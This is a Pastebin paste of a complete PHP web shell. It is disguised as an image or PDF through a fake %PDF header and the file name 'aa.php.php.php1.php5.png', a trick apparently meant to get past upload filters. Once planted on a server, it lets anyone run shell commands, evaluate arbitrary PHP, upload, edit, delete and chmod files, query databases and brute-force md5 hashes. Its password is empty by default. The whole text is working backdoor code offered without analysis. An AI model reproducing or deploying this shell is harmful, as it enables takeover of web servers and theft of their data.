API tools faq
paste
Advertisement
PalmaSolutions

aa.php.php.php1.php5.png

PalmaSolutions
Mar 30th, 2018
335
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 14.52 KB | None | 0 0
raw download clone embed print report
  1. %PDF-1.6
  2. %ту╧╙
  3. <?php
  4. @include"config.php";
  5. error_reporting(0); //If there is an error, we'll show it, k?
  6. $password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
  7. $me = basename(__FILE__);
  8. $cookiename = "wieeeee";
  9.  
  10. if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
  11. {
  12.  if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
  13.  {
  14.   $_POST['pass'] = md5($_POST['pass']);
  15.  }
  16.  if($_POST['pass'] == $password)
  17.  {
  18.    setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
  19.  }
  20.  reload();
  21. }
  22.  
  23. if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
  24. {
  25.  login();
  26.  die();
  27. }
  28. //
  29. //Do not cross this line! All code placed after this block can't be executed without being logged in!
  30. //
  31. if(isset($_GET['p']) && $_GET['p'] == "logout")
  32. {
  33. setcookie ($cookiename, "", time() - 3600);
  34. reload();
  35. }
  36. if(isset($_GET['dir']))
  37. {
  38.  chdir($_GET['dir']);
  39. }
  40.  
  41. $pages = array(
  42.  'cmd' => 'Execute Command',
  43.  'eval' => 'Evaluate PHP',
  44.  'mysql' => 'MySQL Query',
  45.  'chmod' => 'Chmod File',
  46.  'phpinfo' => 'PHPinfo',
  47.  'md5' => 'md5 cracker',
  48.  'headers' => 'Show headers',
  49.  'logout' => 'Log out'
  50. );
  51. //The header, like it?
  52. $header = '<html>
  53. <title>'.getenv("HTTP_HOST").' ~ chmod.php</title>
  54. <head>
  55. <style>
  56. td {
  57. font-size: 12px;
  58. font-family: verdana;
  59. color: #33FF00;
  60. background: #000000;
  61. }
  62. #d {
  63. background: #003000;
  64. }
  65. #f {
  66. background: #003300;
  67. }
  68. #s {
  69. background: #006300;
  70. }
  71. #d:hover
  72. {
  73. background: #003300;
  74. }
  75. #f:hover
  76. {
  77. background: #003000;
  78. }
  79. pre {
  80. font-size: 10px;
  81. font-family: verdana;
  82. color: #33FF00;
  83. }
  84. a:hover {
  85. text-decoration: none;
  86. }
  87.  
  88. input,textarea,select {
  89. border-top-width: 1px;
  90. font-weight: bold;
  91. border-left-width: 1px;
  92. font-size: 10px;
  93. border-left-color: #33FF00;
  94. background: #000000;
  95. border-bottom-width: 1px;
  96. border-bottom-color: #33FF00;
  97. color: #33FF00;
  98. border-top-color: #33FF00;
  99. font-family: verdana;
  100. border-right-width: 1px;
  101. border-right-color: #33FF00;
  102. }
  103. hr {
  104. color: #33FF00;
  105. background-color: #33FF00;
  106. height: 5px;
  107. }
  108. </style>
  109. </head>
  110. <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
  111. <table width=100%><td id="header" width=100%>
  112. <p align=right><b>[<a href="#">root</a>]  [<a href="'.$me.'">Home</a>] ';
  113. foreach($pages as $page => $page_name)
  114. {
  115.  $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
  116. }
  117. $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
  118. print $header;
  119. $footer = '<tr><td><hr><center>&copy; <a href="#">LoocK3D</a> & <a href="#">locked.ks@gmail.com</a></center></td></table></body></head></html>';
  120.  
  121. //
  122. //Page handling
  123. //
  124. if(isset($_REQUEST['p']))
  125. {
  126.   switch ($_REQUEST['p']) {
  127.    
  128.    case 'cmd': //Run command
  129.    
  130.     print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
  131.      if(isset($_REQUEST['command']))
  132.      {
  133.       print "<pre>";
  134.       execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
  135.      }
  136.    break;
  137.    
  138.    
  139.    case 'edit': //Edit a fie
  140.     if(isset($_POST['editform']))
  141.     {
  142.      $f = $_GET['file'];
  143.      $fh = fopen($f, 'w') or print "Error while opening file!";
  144.      fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
  145.      fclose($fh);
  146.     }
  147.     print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
  148.    
  149.     if(file_exists($_GET['file']))
  150.     {
  151.      $rd = file($_GET['file']);
  152.      foreach($rd as $l)
  153.      {
  154.       print htmlspecialchars($l);
  155.      }
  156.     }
  157.    
  158.     print "</textarea><input type=submit value=\"Save\"></form>";
  159.    
  160.    break;
  161.    
  162.    case 'delete': //Delete a file
  163.    
  164.     if(isset($_POST['yes']))
  165.     {
  166.      if(unlink($_GET['file']))
  167.      {
  168.       print "File deleted successfully.";
  169.      }
  170.      else
  171.      {
  172.       print "Couldn't delete file.";
  173.      }
  174.     }
  175.    
  176.    
  177.     if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
  178.     {
  179.      print "Are you sure you want to delete ".$_GET['file']."?<br>
  180.     <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
  181.     <input type=hidden name=yes value=yes>
  182.     <input type=submit value=\"Delete\">
  183.     ";
  184.     }
  185.    
  186.    
  187.    break;
  188.    
  189.    
  190.    case 'eval': //Evaluate PHP code
  191.    
  192.     print "<form action=\"".$me."?p=eval\" method=POST>
  193.    <textarea cols=60 rows=10 name=\"eval\">";
  194.     if(isset($_POST['eval']))
  195.     {
  196.      print htmlspecialchars($_POST['eval']);
  197.     }
  198.     else
  199.     {
  200.      print "print \"Yo Momma\";";
  201.     }
  202.     print "</textarea><br>
  203.    <input type=submit value=\"Eval\">
  204.    </form>";
  205.    
  206.     if(isset($_POST['eval']))
  207.     {
  208.      print "<h1>Output:</h1>";
  209.      print "<br>";
  210.      eval($_POST['eval']);
  211.     }
  212.    
  213.    break;
  214.    
  215.    case 'chmod': //Chmod file
  216.    
  217.    
  218.     print "<h1>Under construction!</h1>";
  219.     if(isset($_POST['chmod']))
  220.     {
  221.     switch ($_POST['chvalue']){
  222.      case 777:
  223.      chmod($_POST['chmod'],0777);
  224.      break;
  225.      case 644:
  226.      chmod($_POST['chmod'],0644);
  227.      break;
  228.      case 755:
  229.      chmod($_POST['chmod'],0755);
  230.      break;
  231.     }
  232.     print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
  233.     }
  234.     if(isset($_GET['file']))
  235.     {
  236.      $content = urldecode($_GET['file']);
  237.     }
  238.     else
  239.     {
  240.      $content = "file/path/please";
  241.     }
  242.    
  243.     print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
  244.    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
  245.    <select name=\"chvalue\">
  246. <option value=\"777\">777</option>
  247. <option value=\"644\">644</option>
  248. <option value=\"755\">755</option>
  249. </select><input type=submit value=\"Change\">";
  250.    
  251.    break;
  252.    
  253.    case 'mysql': //MySQL Query
  254.    
  255.    if(isset($_POST['host']))
  256.    {
  257.     $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
  258.     mysql_select_db($_POST['dbase']);
  259.     $sql = $_POST['query'];
  260.    
  261.    
  262.     $result = mysql_query($sql);
  263.    
  264.    }
  265.    else
  266.    {
  267.     print "
  268.    This only queries the database, doesn't return data!<br>
  269.    <form action=\"".$me."?p=mysql\" method=POST>
  270.    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
  271.    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
  272.    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
  273.    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
  274.    
  275.    <b>Query:<br></b<textarea name=query></textarea>
  276.    <input type=submit value=\"Query database\">
  277.    </form>
  278.    ";
  279.    
  280.    }
  281.    
  282.    break;
  283.    
  284.    case 'createdir':
  285.    if(mkdir($_GET['crdir']))
  286.    {
  287.    print 'Directory created successfully.';
  288.    }
  289.    else
  290.    {
  291.    print 'Couldn\'t create directory';
  292.    }
  293.    break;
  294.    
  295.    
  296.    case 'phpinfo': //PHP Info
  297.     phpinfo();
  298.    break;
  299.    
  300.    
  301.    case 'rename':
  302.    
  303.     if(isset($_POST['fileold']))
  304.     {
  305.      if(rename($_POST['fileold'],$_POST['filenew']))
  306.      {
  307.       print "File renamed.";
  308.      }
  309.      else
  310.      {
  311.       print "Couldn't rename file.";
  312.      }
  313.      
  314.     }
  315.     if(isset($_GET['file']))
  316.     {
  317.      $file = basename(htmlspecialchars($_GET['file']));
  318.     }
  319.     else
  320.     {
  321.      $file = "";
  322.     }
  323.    
  324.     print "Renaming ".$file." in folder ".realpath('.').".<br>
  325.        <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
  326.     <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
  327.     <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
  328.     <input type=submit value=\"Rename file\">
  329.     </form>";
  330.    break;
  331.    
  332.    case 'md5':
  333.    if(isset($_POST['md5']))
  334.    {
  335.    if(!is_numeric($_POST['timelimit']))
  336.    {
  337.    $_POST['timelimit'] = 30;
  338.    }
  339.    set_time_limit($_POST['timelimit']);
  340.     if(strlen($_POST['md5']) == 32)
  341.     {
  342.      
  343.       if($_POST['chars'] == "9999")
  344.       {
  345.       $i = 0;
  346.       while($_POST['md5'] != md5($i) && $i != 100000)
  347.        {
  348.         $i++;
  349.        }
  350.       }
  351.       else
  352.       {
  353.        for($i = "a"; $i != "zzzzz"; $i++)
  354.        {
  355.         if(md5($i == $_POST['md5']))
  356.         {
  357.          break;
  358.         }
  359.        }
  360.       }
  361.      
  362.      if(md5($i) == $_POST['md5'])
  363.      {
  364.        print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
  365.      }
  366.      
  367.     }
  368.    
  369.    }
  370.    
  371.    print "Will bruteforce the md5
  372.    <form action=\"".$me."?p=md5\" method=POST>
  373.    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
  374.    <b>Characters:</b><br><select name=\"chars\">
  375.    <option value=\"az\">a - zzzzz</option>
  376.    <option value=\"9999\">1 - 9999999</option>
  377.    </select>
  378.    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
  379.    <input type=submit value=\"Bruteforce md5\">
  380.    </form><br>*: if set_time_limit is allowed by php.ini";
  381.    break;
  382.    
  383.    case 'headers':
  384.    foreach(getallheaders() as $header => $value)
  385.    {
  386.    print htmlspecialchars($header . ":" . $value)."<br>";
  387.    
  388.    }
  389.    break;
  390.   }
  391. }
  392. else //Default page that will be shown when the page isn't found or no page is selected.
  393. {
  394.  
  395.  $files = array();
  396.  $directories = array();
  397.  
  398.  if(isset($_FILES['uploadedfile']['name']))
  399. {
  400.  $target_path = realpath('.').'/';
  401.  $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
  402.  if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
  403.      print "File:".  basename( $_FILES['uploadedfile']['name']).
  404.      " has been uploaded";
  405.  } else{
  406.      echo "File upload failed!";
  407.  }
  408. }
  409.  
  410.  
  411.  
  412.  
  413.  print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
  414.  if ($handle = opendir('.'))
  415.  {
  416.   while (false !== ($file = readdir($handle)))
  417.   {
  418.         if(is_dir($file))
  419.      {
  420.     $directories[] = $file;
  421.      }
  422.      else
  423.      {
  424.     $files[] = $file;
  425.      }
  426.   }
  427.  asort($directories);
  428.  asort($files);
  429.   foreach($directories as $file)
  430.   {
  431.    print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  432.   }
  433.  
  434.   foreach($files as $file)
  435.   {
  436.    print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  437.   }
  438.  }
  439.  else
  440.  {
  441.   print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
  442.  }
  443.  
  444.  print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
  445. <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
  446. <input type=\"submit\" value=\"Upload File\" />
  447. </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
  448. <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
  449. </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
  450. </table>";
  451.  
  452. }
  453.  
  454. function login()
  455. {
  456.  print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
  457. <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
  458. <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
  459. </form>";
  460. }
  461. function reload()
  462. {
  463.  header("Location: ".basename(__FILE__));
  464. }
  465. function get_execution_method()
  466. {
  467.  if(function_exists('passthru')){ $m = "passthru"; }
  468.  if(function_exists('exec')){ $m = "exec"; }
  469.  if(function_exists('shell_exec')){ $m = "shell_ exec"; }
  470.  if(function_exists('system')){ $m = "system"; }
  471.  if(!isset($m)) //No method found :-|
  472.  {
  473.   $m = "Disabled";
  474.  }
  475.  return($m);
  476. }
  477. function execute_command($method,$command)
  478. {
  479.  if($method == "passthru")
  480.  {
  481.   passthru($command);
  482.  }
  483.  
  484.  elseif($method == "exec")
  485.  {
  486.   exec($command,$result);
  487.   foreach($result as $output)
  488.   {
  489.    print $output."<br>";
  490.   }
  491.  }
  492.  
  493.  elseif($method == "shell_exec")
  494.  {
  495.   print shell_exec($command);
  496.  }
  497.  
  498.  elseif($method == "system")
  499.  {
  500.   system($command);
  501.  }
  502. }
  503. function perm($file)
  504. {
  505.  if(file_exists($file))
  506.  {
  507.   return substr(sprintf('%o', fileperms($file)), -4);
  508.  }
  509.  else
  510.  {
  511.   return "????";
  512.  }
  513. }
  514. function get_color($file)
  515. {
  516. if(is_writable($file)) { return "green";}
  517. if(!is_writable($file) && is_readable($file)) { return "white";}
  518. if(!is_writable($file) && !is_readable($file)) { return "red";}
  519.  
  520. }
  521. function show_dirs($where)
  522. {
  523.  if(ereg("^c:",realpath($where)))
  524.  {
  525.  $dirparts = explode('\\',realpath($where));
  526.  }
  527.  else
  528.  {
  529.  $dirparts = explode('/',realpath($where));
  530.  }
  531.  
  532.  
  533.  
  534.  $i = 0;
  535.  $total = "";
  536.  
  537.  foreach($dirparts as $part)
  538.  {
  539.   $p = 0;
  540.   $pre = "";
  541.   while($p != $i)
  542.   {
  543.    $pre .= $dirparts[$p]."/";
  544.    $p++;
  545.    
  546.   }
  547.   $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
  548.   $i++;
  549.  }
  550.  
  551.  return "<h2>".$total."</h2><br>";
  552. }
  553. print $footer;
  554. // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
  555. exit();
  556. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!